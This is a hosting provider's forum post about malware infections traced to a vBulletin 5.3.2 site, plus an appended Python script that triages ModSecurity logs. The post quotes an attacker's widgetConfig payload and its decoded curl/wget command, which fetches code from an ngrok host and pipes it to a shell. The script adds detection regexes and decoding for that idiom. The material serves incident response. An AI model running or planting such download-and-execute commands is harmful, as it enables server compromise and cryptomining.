vBulletin® Version 5.3.2. We host the site; I do not have the owner's login credentials for this forum. Please excuse me if this post is inappropriate. That is not my intention. If we need to repost in your tech forum, we will contact our customer accordingly for credentials.
We have been plagued with the Multios.Coinminer.Miner and the Unix.Malware.Agent viruses the past few days.
The vector it is using to infect is a vBulletin site - or so it seems.
Sample log
0191018:[Thu Oct 17 18:01:45.891136 2019] [:error] [pid 9510] [client 194.99.105.75] ModSecurity: Warning. Pattern match "\\\\W{4,}" at ARGS:widgetConfig[code].
[file "/etc/httpd/modsecurity.d/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"]
[msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');
found within ARGS:widgetConfig[code]: echo shell_exec('echo KGN1cmwgLW0gMzAgLXNrICdodHRwOi8vNWE1Yjk5OTgubmdyb2suaW8vZi9zZXJ2ZT9sPXYmcj1kZmEzYmNhOGE1MD IwYzNlMjdjZjY4ZjhlZDFjMjJkNycgfHwgd2dldCAtcSAtTy0gImh0dHA6Ly81YTViOTk5OC5uZ3Jvay5pby9mL3Nl cnZlP2w9diZyPWRmYTNiY2E4YTUwMjBjM2UyN2NmNjhmOGVkMWMyMmQ3IiApIHwgc2g=|base64 -d|sh;echo HHKU8JE');
Decoding the base64 string gives:
(curl -m 30 -sk 'http://2087eb24.ngrok.io/f/serve?l=v&r=dfa3bca8a5020c3e27cf68f8ed1c22d7' || wget -q -O- "http://2087eb24.ngrok.io/f/serve?l=v&r=dfa3bca8a5020c3e27cf68f8ed1c22d7" ) | sh
No question this is the source of the virus infections. I downloaded the code...
The client IPs change, but they all point to only one vBulletin site we host, and the timestamps within the website access logs match exactly the creation times of the virus files and directories.
Is this a known bug - maybe with widget code in some way - and we need to upgrade/patch? Posting before upgrading to see if this is a known issue with our version first.
Site permissions seem perfect.
Thank you
-Nick
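As an added example (not part of Nick's post and not vBulletin or ModSecurity code), here is a small triage helper for the kind of log line quoted above: it pulls the client address, rule id and offending argument out of a ModSecurity error-log entry, finds the "echo <base64> | base64 -d | sh" idiom in the matched data, decodes the blob (tolerating the whitespace that log wrapping inserts into it) and lists the URLs and hostnames it contains, so each hit can be decoded and checked against an IoC list instead of being decoded by hand. The SAMPLE_LOG is the post's own log entry re-joined into one line; the function names and field layout are this example's own assumptions.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed sample: the ModSecurity error-log entry quoted in the post,
# re-joined into a single line. The two stray spaces inside the base64 blob
# come from the forum wrapping the line; the decoder below strips them.
SAMPLE_LOG = (
    "[Thu Oct 17 18:01:45.891136 2019] [:error] [pid 9510] [client 194.99.105.75] "
    "ModSecurity: Warning. Pattern match \"\\\\W{4,}\" at ARGS:widgetConfig[code]. "
    "[file \"/etc/httpd/modsecurity.d/activated_rules/modsecurity_crs_40_generic_attacks.conf\"] "
    "[line \"37\"] [id \"960024\"] [rev \"2\"] "
    "[msg \"Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters\"] "
    "[data \"Matched Data: '); found within ARGS:widgetConfig[code]: "
    "echo shell_exec('echo KGN1cmwgLW0gMzAgLXNrICdodHRwOi8vNWE1Yjk5OTgubmdyb2suaW8vZi9z"
    "ZXJ2ZT9sPXYmcj1kZmEzYmNhOGE1MD IwYzNlMjdjZjY4ZjhlZDFjMjJkNycgfHwg"
    "d2dldCAtcSAtTy0gImh0dHA6Ly81YTViOTk5OC5uZ3Jvay5pby9mL3Nl cnZlP2w9"
    "diZyPWRmYTNiY2E4YTUwMjBjM2UyN2NmNjhmOGVkMWMyMmQ3IiApIHwgc2g=|base64 -d|sh;echo HHKU8JE');\"]"
)

# ModSecurity writes most metadata as [name "value"] pairs.
MODSEC_FIELD = re.compile(r'\[(\w+) "((?:[^"\\]|\\.)*)"\]')
CLIENT_RE = re.compile(r"\[client ([0-9.]+|[0-9a-fA-F:]+)\]")
# The variable the rule fired on, e.g. ARGS:widgetConfig[code]
ARG_RE = re.compile(r'Pattern match "(?:[^"\\]|\\.)*" at (\S+?)\.\s')
# "echo <blob> | base64 -d | sh": decode-and-execute idiom seen in the post.
# The capture class allows whitespace so a wrapped blob is still matched whole.
B64_EXEC_RE = re.compile(
    r"echo\s+([A-Za-z0-9+/=\s]+?)\s*\|\s*base64\s+(?:-d|--decode)\s*\|\s*(?:ba|da|z)?sh\b"
)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def decode_base64_exec(text: str) -> list:
    """Return the decoded command for every 'echo <b64>|base64 -d|sh' found in text."""
    decoded = []
    for match in B64_EXEC_RE.finditer(text):
        blob = re.sub(r"\s+", "", match.group(1))  # drop wrap-induced whitespace
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (ValueError, base64.binascii.Error):
            continue  # not valid base64; skip rather than crash the triage run
    return decoded


def triage(line: str) -> dict:
    """Extract the fields a responder wants from one ModSecurity error-log line."""
    fields = dict(MODSEC_FIELD.findall(line))
    client = CLIENT_RE.search(line)
    arg = ARG_RE.search(line)
    payloads = decode_base64_exec(fields.get("data", ""))
    urls = sorted({u for p in payloads for u in URL_RE.findall(p)})
    return {
        "client": client.group(1) if client else None,
        "rule_id": fields.get("id"),
        "arg": arg.group(1) if arg else None,
        "decoded": payloads,
        "urls": urls,
        "hosts": sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname}),
    }


def scan(log_text: str) -> list:
    """Triage every ModSecurity line in a log; lines without a decodable payload are skipped."""
    results = []
    for line in log_text.splitlines():
        if "ModSecurity:" not in line:
            continue
        result = triage(line)
        if result["decoded"]:
            results.append(result)
    return results


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["client"], hit["rule_id"], hit["arg"])
        for cmd in hit["decoded"]:
            print("  decoded:", cmd)
        print("  hosts:", hit["hosts"])
```

Run it over the raw error_log and feed the "hosts" and "urls" values to whatever blocklist or log search is used to find the other hits. One thing the sample makes visible: the blob in the quoted log line decodes to a 5a5b9998.ngrok.io URL, while the decoded command pasted in the post points at 2087eb24.ngrok.io, so the download host differs between samples and every hit is worth decoding rather than relying on one.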